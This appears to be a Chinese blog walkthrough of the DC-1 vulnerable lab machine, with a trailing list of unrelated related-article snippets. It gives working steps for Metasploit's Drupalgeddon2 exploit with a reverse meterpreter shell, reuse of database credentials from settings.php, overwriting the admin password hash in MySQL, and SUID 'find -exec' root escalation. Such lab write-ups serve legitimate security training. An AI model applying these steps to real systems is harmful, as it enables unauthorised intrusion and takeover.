DC-1 靶场学习

news2025/7/11 13:02:37

以前写过了,有一些忘了,快速的重温一遍。
DC一共九个靶场,目标一天一个。

文章目录

  • 环境配置:
  • 信息搜集:
  • 漏洞复现:
  • FLAG获取

环境配置:

最简单的办法莫过于将kali和DC-1同属为一个nat的网络下。

image-20230224151556977

image-20230224151420206

image-20230224151424358

信息搜集:

首先探测靶机ip,两种方法:

arp-scan -l
nmap -sP 192.168.28.0/24

image-20230224151844953

image-20230224151934633

靶机ip为192.168.28.129

image-20230224152007329

明显有一个80端口,继续用nmap探测端口情况。

image-20230224152145026

还开起了22和111端口,wappalyzer信息搜集,看一下框架。

image-20230224152437666

或者用kali自带的whatweb指纹探测。

whatweb -v 192.168.28.129

image-20230224152639042

同样得到的是Drupal7.0版本,msfconsole里存在Drupal攻击模块。

漏洞复现:

search去找Drupal模块

search Drupal

image-20230224153110889

进入exploit/unix/webapp/drupal_drupalgeddon2模块,然后查看payload。

use exploit/unix/webapp/drupal_drupalgeddon2
show payloads

image-20230224153319619

php/meterpreter/reverse_tcp可以利用。

然后设置payload和配置。

set payload /php/meterpreter/reverse_tcp
set RHOSTS 192.168.28.129

输入exploit启动。

image-20230224153645562

成功拿到shell,先反弹shell。

python -c "import pty;pty.spawn('/bin/bash')"

image-20230224153841490

FLAG获取

然后ls -l发现flag1.

Every good CMS needs a config file - and so do you
每个好的CMS都需要一个配置文件 - 你也是

明显是想让我们去查看配置文件。

image-20230224154037611

发现settings.php文件,查看后得到flag2.

 Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
蛮力和字典攻击不是
 *只有获得访问权限的方法(您将需要访问权限)。
 * 您可以使用这些凭据做什么?

不能爆破,但在配置中存在mysql账号密码,可以通过mysql查看账号密码。

mysql -udbuser -pR0ck3t

登录mysql。

在其中找到user表。

image-20230224154902860

但其中的pass被加密,猜测存在哈希加密代码,查找。

find . -name *hash*

image-20230224155102664

找到的password-hash.sh,这肯定是加密代码,cat一下。

#!/usr/bin/php
<?php

/**
 * Drupal hash script - to generate a hash from a plaintext password
 *
 * Check for your PHP interpreter - on Windows you'll probably have to
 * replace line 1 with
 *   #!c:/program files/php/php.exe
 *
 * @param password1 [password2 [password3 ...]]
 *  Plain-text passwords in quotes (or with spaces backslash escaped).
 */

if (version_compare(PHP_VERSION, "5.2.0", "<")) {
  $version  = PHP_VERSION;
  echo <<<EOF

ERROR: This script requires at least PHP version 5.2.0. You invoked it with
       PHP version {$version}.
\n
EOF;
  exit;
}

$script = basename(array_shift($_SERVER['argv']));

if (in_array('--help', $_SERVER['argv']) || empty($_SERVER['argv'])) {
  echo <<<EOF

Generate Drupal password hashes from the shell.

Usage:        {$script} [OPTIONS] "<plan-text password>"
Example:      {$script} "mynewpassword"

All arguments are long options.

  --help      Print this page.

  --root <path>

              Set the working directory for the script to the specified path.
              To execute this script this has to be the root directory of your
              Drupal installation, e.g. /home/www/foo/drupal (assuming Drupal
              running on Unix). Use surrounding quotation marks on Windows.

  "<password1>" ["<password2>" ["<password3>" ...]]

              One or more plan-text passwords enclosed by double quotes. The
              output hash may be manually entered into the {users}.pass field to
              change a password via SQL to a known value.

To run this script without the --root argument invoke it from the root directory
of your Drupal installation as

  ./scripts/{$script}
\n
EOF;
  exit;
}

$passwords = array();

// Parse invocation arguments.
while ($param = array_shift($_SERVER['argv'])) {
  switch ($param) {
    case '--root':
      // Change the working directory.
      $path = array_shift($_SERVER['argv']);
      if (is_dir($path)) {
        chdir($path);
      }
      break;
    default:
      // Add a password to the list to be processed.
      $passwords[] = $param;
      break;
  }
}

define('DRUPAL_ROOT', getcwd());

include_once DRUPAL_ROOT . '/includes/password.inc';
include_once DRUPAL_ROOT . '/includes/bootstrap.inc';

foreach ($passwords as $password) {
  print("\npassword: $password \t\thash: ". user_hash_password($password) ."\n");
}
print("\n");

先看帮助,理解脚本如何使用。

image-20230224155402217

然后运行脚本然后得到加密过后密码,随后密码替换。

update users set pass="$S$Ds.RBZ79FgPXwUiHZZd5eo2rVbYQzTomLgBhA24Sw04Bnr3UWSpB"where name="admin";

然后登录网站得到flag3

Special PERMS will help FIND the passwd - but you’ll need to -exec that command to work out how to get what’s in the shadow.
特殊的 PERMS 将帮助找到 passwd - 但您需要 -exec 该命令来弄清楚如何获取阴影中的东西。

在/etc/passwd中发现flag4用户。

image-20230224160636908

得到flag4。

Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?
您可以使用相同的方法来查找或访问 root 中的标志吗?
可能。但也许这并不容易。 或者也许是?

访问root文件夹需要root权限。

SUID提权:

find / -user root -perm -4000 -print 2>/dev/null

其中就有find,直接用。

find / -exec "/bin/bash" -p \;

image-20230224161616986

进入root目录得到最后的flag。

Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
干的好!!!!

希望您喜欢这个并学到了一些新技能。

你可以让我知道你对这个小旅程的看法
通过推特与我联系 - @DCAU7

利用hydra暴力破解得到flag4的密码。

image-20230224172053998

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/369408.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

RK3568移植5G通信模组

5G通信模组这次移植的5G通信模组选择的是深圳广和通公司生产的FG650 5G通信模组&#xff0c;对外的通信数据接口为USB2.0, USB3.0两个接口。FG650模组默认工作在NCM驱动模式&#xff0c;如果不是可以通过串口发送AT指令ATGTUSBMODE36来修改成工作在NCM模式。linux内核代码的修改…

TX Text Control .NET Server for ASP.NET 31.0 SP2 CRK

用于 ASP.NET 31.0 SP2 的 TX 文本控件 .NET 服务器 用于 ASP.NET 的 TX 文本控件 .NET 服务器 TX Text Control Server for ASP.NET 是用于 Web 应用程序或服务的服务器端组件。它是一个完全可编程的 ASP.NET 文字处理器引擎&#xff0c;提供了广泛的文字处理功能。使用 TX Te…

MySQL Administrator定时备份MySQL数据库

1、下载并安装软件mysql-gui-tools-5.0-r17-win32.exe 2、将汉化包zh_CN文件夹拷贝到软件安装目录 3、菜单中打开MySql Adminstrator&#xff0c;见下图&#xff0c;初次打开无服务实例。 点击已存储连接右侧按钮①&#xff0c;打开下图对话框。点击“新连接”按钮&#xff…

构建matter over Thread的演示系统-efr32

文章目录1. 简介2. 构建测试系统2.1设置 Matter Hub(Raspberry Pi)2.2 烧录Open Thread RCP固件2.3 烧录待测试的matter设备3. 配网和测试&#xff1a;3.1 使用mattertool建立Thread网络3.2 使用mattertool配置设备入网3.3 使用mattertool控制matter设备3.4 查看节点的Node ID等…

如何高效管理自己的时间,可以从这几个方向着手

如果你是上班族&#xff0c;天选打工人&#xff0c;你的绝大多数时间都属于老板&#xff0c;能够自己支配的时间其实并不多&#xff0c;所以你可能察觉不到时间管理的重要性。但如果你是自由职业者或者创业者&#xff0c;想要做出点成绩&#xff0c;那你就需要做好时间管理&…

Ingress-nginx 部署及模拟实战

写在最前面&#xff0c;博主希望大家看这篇文章过程中&#xff0c;重点看实例演示&#xff0c;因为我觉得部署安装&#xff0c;网上千篇一律&#xff0c;如果按照网上的教程安装不成功&#xff0c;要么网上省略了一部分没写&#xff0c;要么你的基础环境和人家的不一样&#xf…

web接入大华摄像头实时视频

目录 一、FFmpeg下载及配置​​​​ 二、nginx下载及配置 三、摄像rtsp取流 四、ffmpeg推流 五、html前端工作 一、FFmpeg下载及配置​​​​ 地址&#xff1a;Download FFmpeg 下载并解压FFmpeg文件夹&#xff0c;配置环境变量&#xff1a;在“Path”变量原有变量值内容…

直播平台的视频美颜sdk是什么?

直播平台的视频美颜sdk是什么&#xff0c;可以做什么&#xff1f;简而言之&#xff0c;直播美颜sdk是将直播平台的视频美颜效果做成一个sdk&#xff0c;给用户提供美颜效果选择&#xff0c;同时提供不同的视频分辨率&#xff0c;可以让用户在观看直播时有更好的体验。那么具体有…

230224-Zotero-坚果云-MacOS/PadOS同步注意事项

Background Zotero的设置参考了这篇文章&#xff0c;随时随地看文献 —— Zotero 与 iPad 的巧妙搭配&#xff08;wiz坚果云&#xff09; 注意事项1 路径&#xff1a; 可自定义或使用默认路径&#xff08;记得在坚果云根目录下创建zotero文件夹&#xff09;密码&#xff1a;…

良许也成为砖家啦~

大家好&#xff0c;我是良许。 没错&#xff0c;良许成为砖家啦&#xff0c;绝不是口嗨&#xff0c;有图有真相&#xff01; 有人会说&#xff0c;咦&#xff0c;这明明是严宇啊&#xff0c;跟你良许有啥关系&#xff1f; 额。。老读者应该知道良许的来历—— 鄙人真名严宇&a…

一文深入分析-内核并发消杀器(KCSAN)

一、KCSAN介绍 KCSAN(Kernel Concurrency Sanitizer)是一种动态竞态检测器&#xff0c;它依赖于编译时插装&#xff0c;并使用基于观察点的采样方法来检测竞态&#xff0c;其主要目的是检测数据竞争。 KCSAN是一种检测LKMM(Linux内核内存一致性模型)定义的数据竞争(data race…

DataWhale 大数据处理技术组队学习task4

五、分布式并行编程模型MapReduce 1. 概述 1.1 分布式并行编程 背景&#xff1a;摩尔定律已经开始逐渐失效&#xff0c;提升数据处理计算能力刻不容缓。传统的程序开发与分布式并行编程 传统的程序开发&#xff1a;以单指令、单数据流的方式顺序执行&#xff0c;虽然这种方式…

重走前端路JS进阶篇:This 指向与箭头函数

JavaScript 高级 This 指向规则 案例 function foo() {console.log(this)}// 1 调用方式1foo();// 2 调用方式2 放入对象中调用var obj {name: "why",foo: foo}obj.foo()// 调用方式三 通过 call/apply 调用foo.call("abc")指向定义 this 是js 给函数的…

SQL零基础入门学习(十)

SQL零基础入门学习&#xff08;九&#xff09; SQL CREATE DATABASE 语句 CREATE DATABASE 语句用于创建数据库。 SQL CREATE DATABASE 语法 CREATE DATABASE dbname;SQL CREATE DATABASE 实例 下面的 SQL 语句创建一个名为 “my_db” 的数据库&#xff1a; CREATE DATAB…

内网solr全文搜索服务器,快解析一步映射让外网访问

Solr&#xff0c;指apache solr&#xff0c;其全称为Search On Lucene Replication。Solr&#xff0c;是一个高性能&#xff0c;采用java开发&#xff0c;基于Lucene的全文搜索服务器。同时对其进行了扩展&#xff0c;提供了比Lucene更为丰富的查询语言&#xff0c;同时实现了可…

算法练习-栈和队列(二)

算法练习-栈和队列(二) 文章目录算法练习-栈和队列(二)1.计算器1.1 题目1.2 题解2. 删除字符串中所有相邻重复项2.1 题目2.2 题解3 栈的压入、弹出序列3.1 题目3.2 题解4 每日温度4.1 题目4.2 题解4.2.1 暴力解法&#xff08;超出时间限制&#xff09;4.2.2单调栈5 接雨水&…

i2c子系统

i2c 硬件协议 Linux 应用层读写i2c 数据 在Linux系统上&#xff0c;不仅可以在内核中使用 i2c 总线发送、接收数据&#xff0c;同时也支持应用层使用i2c 总线发送、接收。 如果在内核中使能了drivers/i2c/i2c-dev.c 配置&#xff0c;内核就会为每一个i2c 控制器生成一个/dev/…

如何使评论具有可操作性?取悦客户的指南

永远不要低估承认的力量。 当品牌与客户互动时&#xff0c;认可会带来更好的关系和更好的沟通。与买家和客户建立更多的个人联系意味着品牌需要证明他们支持他们的产品和客户。评论是利用客户分享他们的故事的那些时刻的绝佳机会。 为什么评论在 SaaS 中至关重要 在 B2B 软件的…

robot framework + python实现http接口自动化测试框架

前言 下周即将展开一个http接口测试的需求&#xff0c;刚刚完成的java类接口测试工作中&#xff0c;由于之前犯懒&#xff0c;没有提前搭建好自动化回归测试框架&#xff0c;以至于后期rd每修改一个bug&#xff0c;经常导致之前没有问题的case又产生了bug&#xff0c;所以需要…

金仓数据库安装

一、麒麟操作系统安装金仓数据库 操作系统 DISTRIB_IDKylin DISTRIB_RELEASEV10 DISTRIB_CODENAMEjuniper 按照安装文档的步骤安装&#xff0c;记得记住设置的数据库的用户名、密码 二、window安装连接数据库的工具软件 三、jdbc连接数据库 &#xff08;1&#xff09;连接工…